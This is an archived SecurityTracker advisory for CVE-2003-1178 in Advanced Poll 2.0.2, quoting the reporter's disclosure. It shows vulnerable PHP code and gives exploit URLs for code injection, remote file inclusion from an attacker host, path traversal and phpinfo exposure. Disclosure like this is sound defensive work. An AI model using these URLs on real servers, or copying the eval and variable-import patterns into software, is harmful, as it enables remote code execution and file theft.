SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Generic)  >  Advanced Poll Vendors:  Chi Kien Uong
Advanced Poll Include File Error Lets Remote Users Execute Arbitrary PHP Code and Operating System Commands
SecurityTracker Alert ID:  1008005
SecurityTracker URL:  http://securitytracker.com/id?1008005
CVE Reference:  CVE-2003-1178   (Links to External Site)
OSVDB Reference:  2743   (Links to External Site)
Updated:  Oct 11 2006
Original Entry Date:  Oct 27 2003
Impact:  Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 2.0.2 (Textfile Version)
Description:  An include file vulnerability was reported in Advanced Poll. A remote user can execute arbitrary commands on the target server.

Frog-m@n reported that several scripts include files relative to variables that can be defined by the remote user. A remote user can define an alternate location for several of the variables to cause PHP code at the alternate location to be included and executed by the target server.

A demonstration exploit URL is provided:

http://[target]/admin/common.inc.php?basepath=http://[attacker]

The above URL will reportedly cause the 'http://[attacker]/lang/english.php' file to be included and executed on the target system.

Several other demonstration exploits are described in the Source Message.
Impact:  A remote user can execute arbitrary PHP code, including operating system commands, on the target system. The code will run with the privileges of the target web server.
Solution:  No vendor solution was available at the time of this entry. An unofficial patch is available at:

http://www.phpsecure.info
Vendor URL:  proxy2.de/scripts.php (Links to External Site)
Cause:  Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  "Frog Man" <leseulfrog@hotmail.com>
Message History:   None.

 Source Message Contents
Date:  Sat, 25 Oct 2003 16:04:55 +0200
From:  "Frog Man" <leseulfrog@hotmail.com>
Subject:  [VulnWatch] Advanced Poll : PHP Code Injection, File Include, Phpinfo

 

Informations :
°°°°°°°°°°°°°
Language : PHP
Product : Advanced Poll
Version : 2.0.2 Textfile
Website : http://www.proxy2.de
Problems :
- PHP Code Injection
- File Include
- Phpinfo


PHP Code/Location :
°°°°°°°°°°°°°°°°°°°

comments.php :

-----------------------------------------------------------------------------------------------------
-
[...]
$register_poll_vars = array("id","template_set","action");

for ($i=0;$i<sizeof($register_poll_vars);$i++) {
    if (isset($HTTP_POST_VARS[$register_poll_vars[$i]])) {
        eval("\$$register_poll_vars[$i] = 
\"".trim($HTTP_POST_VARS[$register_poll_vars[$i]])."\";");
    } elseif (isset($HTTP_GET_VARS[$register_poll_vars[$i]])) {
        eval("\$$register_poll_vars[$i] = 
\"".trim($HTTP_GET_VARS[$register_poll_vars[$i]])."\";");
    } else {
        eval("\$$register_poll_vars[$i] = '';");
    }
 
[...]
-----------------------------------------------------------------------------------------------------
-



booth.php, png.php :

---------------------------------------------------------------
<?php

$include_path = dirname(__FILE__);
if ($include_path == "/") {
    $include_path = ".";
 

if (!isset($PHP_SELF)) {
    global $HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_SERVER_VARS;
    $PHP_SELF = $HTTP_SERVER_VARS["PHP_SELF"];
    if (isset($HTTP_GET_VARS)) {
        while (list($name, $value)=each($HTTP_GET_VARS)) {
            $$name=$value;
        }
    }
    if (isset($HTTP_POST_VARS)) {
        while (list($name, $value)=each($HTTP_POST_VARS)) {
            $$name=$value;
        }
    }
    if(isset($HTTP_COOKIE_VARS)){
        while (list($name, $value)=each($HTTP_COOKIE_VARS)){
            $$name=$value;
        }
    }
 

require $include_path."/include/config.inc.php";
require $include_path."/include/class_poll.php";
[...]
---------------------------------------------------------------


poll_ssi.php, popup.php :

----------------------
include "./booth.php";
----------------------




admin/common.inc.php :

---------------------------------------------------------------
[...]
if (!isset($PHP_SELF)) {
    $PHP_SELF = $HTTP_SERVER_VARS["PHP_SELF"];
    if (isset($HTTP_GET_VARS)) {
        while (list($name, $value)=each($HTTP_GET_VARS)) {
            $$name=$value;
        }
    }
    if (isset($HTTP_POST_VARS)) {
        while (list($name, $value)=each($HTTP_POST_VARS)) {
            $$name=$value;
        }
    }
    if(isset($HTTP_COOKIE_VARS)){
        while (list($name, $value)=each($HTTP_COOKIE_VARS)){
            $$name=$value;
        }
    }
 

$pollvars['SELF'] = basename($PHP_SELF);
unset($lang);
if (file_exists("$base_path/lang/$pollvars[lang]")) {
    include ("$base_path/lang/$pollvars[lang]");
} else {
    include ("$base_path/lang/english.php");
 
[...]
---------------------------------------------------------------


In the /admin/ directory, in the files :

- index.php
- admin_tpl_new.php
- admin_tpl_misc_new.php
- admin_templates_misc.php
- admin_templates.php
- admin_stats.php
- admin_settings.php
- admin_preview.php
- admin_password.php
- admin_logout.php
- admin_license.php
- admin_help.php
- admin_embed.php
- admin_edit.php
- admin_comment.php

 

------------------------------------
[...]
$include_path = dirname(__FILE__);
$base_path = dirname($include_path);

require "./common.inc.php";
[...]
------------------------------------


misc/info.php :

-------------------------
<html>
<head>
<title>PHP Info</title>
</head>
<body bgcolor="#3A6EA5">
<?php
phpinfo();
?>
-------------------------


Exploits :
°°°°°°°°

- if magic_quotes_gpc=OFF :

http://[target]/comments.php?id=";[PHPCODE]//&template_set=";[PHPCODE]//&action="
;[PHPCODE]//

or with a POST form or cookies.

- This will only work if register_globals=OFF (this is not an error...) :

http://[target]/booth.php?include_path=http://[attacker] (or with png.php, 
poll_ssi.php, popup.php) will include the files :
http://[attacker]/include/config.inc.php
and
http://[attacker]/include/class_poll.php

- This will work if register_globals=OFF OR ON :

http://[target]/admin/common.inc.php?basepath=http://[attacker] will include 
the file http://[attacker]/lang/english.php.

The same hole can be found, in the /admin/ directory, in the files :

- index.php
- admin_tpl_new.php
- admin_tpl_misc_new.php
- admin_templates_misc.php
- admin_templates.php
- admin_stats.php
- admin_settings.php
- admin_preview.php
- admin_password.php
- admin_logout.php
- admin_license.php
- admin_help.php
- admin_embed.php
- admin_edit.php
- admin_comment.php

but only with register_globals=OFF.
And, with register_globals=OFF and with all the files above again, the url 
http://[target]/admin/common.inc.php?base_path=..&pollvars[lang]=../../../file/to/view 
will include the file http://[target]/admin/../../../file/to/view


- http://[target]/misc/info.php will show the phpinfo().


Solution/More details :
°°°°°°°°°°°°°°°°°°°°
Both patch and details can be found on http://www.phpsecure.info .


Credits :
°°°°°°°°
frog-m@n
http://www.phpsecure.info

_________________________________________________________________
Hotmail: votre e-mail gratuit ! http://www.fr.msn.be/hotmail


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2006, SecurityGlobal.net LLC